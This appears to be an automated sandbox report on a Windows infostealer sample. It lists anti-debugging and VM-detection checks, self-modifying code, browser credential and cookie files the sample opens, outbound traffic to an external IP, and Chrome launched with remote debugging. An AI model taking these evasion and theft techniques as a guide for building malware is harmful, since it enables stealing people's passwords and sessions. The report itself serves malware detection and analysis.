Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB00C7 second address: 7AB013A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F19CD112F6Dh 0x00000015 add cx, 0446h 0x0000001a jmp 00007F19CD112F71h 0x0000001f popfd 0x00000020 mov di, si 0x00000023 popad 0x00000024 sub esp, 18h 0x00000027 jmp 00007F19CD112F6Ah 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F19CD112F6Eh 0x00000034 sub ah, 00000018h 0x00000037 jmp 00007F19CD112F6Bh 0x0000003c popfd 0x0000003d mov edi, eax 0x0000003f popad 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 mov cx, 671Dh 0x00000048 push esi 0x00000049 pop edx 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB013A second address: 7AB01C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c mov di, E066h 0x00000010 pop ebx 0x00000011 pushfd 0x00000012 jmp 00007F19CCBA87BCh 0x00000017 or al, FFFFFFD8h 0x0000001a jmp 00007F19CCBA87BBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebx, dword ptr [eax+10h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F19CCBA87BBh 0x0000002d adc cl, FFFFFF9Eh 0x00000030 jmp 00007F19CCBA87C9h 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F19CCBA87C0h 0x0000003c sbb eax, 4AB09598h 0x00000042 jmp 00007F19CCBA87BBh 0x00000047 popfd 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB11A4 second address: 7AB11AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB11AA second address: 7AB1232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+08h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F19CD112F6Eh 0x00000013 add ecx, 2BCCCE28h 0x00000019 jmp 00007F19CD112F6Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F19CD112F78h 0x00000025 sbb al, FFFFFF88h 0x00000028 jmp 00007F19CD112F6Bh 0x0000002d popfd 0x0000002e popad 0x0000002f mov eax, dword ptr [esi+0Ch] 0x00000032 jmp 00007F19CD112F76h 0x00000037 mov dword ptr [edx+0Ch], eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1232 second address: 7AB1236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1236 second address: 7AB123A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB123A second address: 7AB1240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1240 second address: 7AB1246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1246 second address: 7AB12D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+10h] 0x0000000e pushad 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F19CCBA87BCh 0x00000016 or eax, 43D74078h 0x0000001c jmp 00007F19CCBA87BBh 0x00000021 popfd 0x00000022 jmp 00007F19CCBA87C8h 0x00000027 popad 0x00000028 call 00007F19CCBA87C2h 0x0000002d call 00007F19CCBA87C2h 0x00000032 pop esi 0x00000033 pop ebx 0x00000034 popad 0x00000035 mov dword ptr [edx+10h], eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F19CCBA87BDh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB12D0 second address: 7AB12D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB12D6 second address: 7AB12DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB12DA second address: 7AB1330 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+14h] 0x0000000b jmp 00007F19CD112F6Fh 0x00000010 mov dword ptr [edx+14h], eax 0x00000013 pushad 0x00000014 mov dx, cx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F19CD112F6Eh 0x0000001e jmp 00007F19CD112F75h 0x00000023 popfd 0x00000024 movzx esi, di 0x00000027 popad 0x00000028 popad 0x00000029 mov eax, dword ptr [esi+18h] 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov edi, ecx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1330 second address: 7AB1335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1335 second address: 7AB1343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CD112F6Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB144B second address: 7AB1467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, ch 0x00000006 popad 0x00000007 mov ecx, edi 0x00000009 popad 0x0000000a mov ecx, dword ptr [esi+2Ch] 0x0000000d pushad 0x0000000e mov di, 50BEh 0x00000012 popad 0x00000013 mov dword ptr [edx+2Ch], ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1467 second address: 7AB146D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB146D second address: 7AB148F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB148F second address: 7AB1493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1493 second address: 7AB14B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB14B0 second address: 7AB14B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB14B6 second address: 7AB14BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB14BA second address: 7AB14BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB14BE second address: 7AB1513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+30h], ax 0x0000000c jmp 00007F19CCBA87BFh 0x00000011 mov ax, word ptr [esi+32h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 call 00007F19CCBA87BBh 0x0000001d pop eax 0x0000001e pushfd 0x0000001f jmp 00007F19CCBA87C9h 0x00000024 jmp 00007F19CCBA87BBh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1513 second address: 7AB153C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov esi, ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [edx+32h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F19CD112F78h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB153C second address: 7AB154E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CCBA87BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB154E second address: 7AB155F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+34h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB155F second address: 7AB1565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1565 second address: 7AB156B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB156B second address: 7AB156F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Special instruction interceptor: First address: 141FAF9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Special instruction interceptor: First address: 141D6BE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Special instruction interceptor: First address: 165A5CC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window / User API: threadDelayed 1892
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window / User API: threadDelayed 1890
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window / User API: threadDelayed 999
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window / User API: threadDelayed 985
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window / User API: threadDelayed 984
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 6569
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 3430
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.1 %
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 2076 Thread sleep count: 43 > 30
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 2076 Thread sleep time: -86043s >= -30000s
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 5740 Thread sleep count: 42 > 30
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 5740 Thread sleep time: -84042s >= -30000s
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 5720 Thread sleep count: 1892 > 30
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 5720 Thread sleep time: -3785892s >= -30000s
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 5264 Thread sleep count: 1890 > 30
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 5264 Thread sleep time: -3781890s >= -30000s
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 4312 Thread sleep count: 999 > 30
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 4312 Thread sleep time: -1998999s >= -30000s
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 1436 Thread sleep count: 985 > 30
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 1436 Thread sleep time: -1970985s >= -30000s
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 1076 Thread sleep count: 984 > 30
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 1076 Thread sleep time: -1968984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 4336 Thread sleep count: 6569 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 4336 Thread sleep time: -656900s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 4336 Thread sleep count: 3430 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 4336 Thread sleep time: -343000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 95e1Fwp61u.exe, 00000000.00000003.1764123776.0000000002132000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2161361520.000001B0D9FA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.13.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\95e1Fwp61u.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\95e1Fwp61u.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: NTICE
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: SICE
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: SIWVID
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00B48230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 8_2_00B48230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00B4116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 8_2_00B4116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00B411A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_00B411A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00B41160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_00B41160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00B413C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 8_2_00B413C9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1584D0 cpuid 8_2_6C1584D0
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 8.2.service123.exe.6c0d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 6828, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 185.121.15.192:80
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality

Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP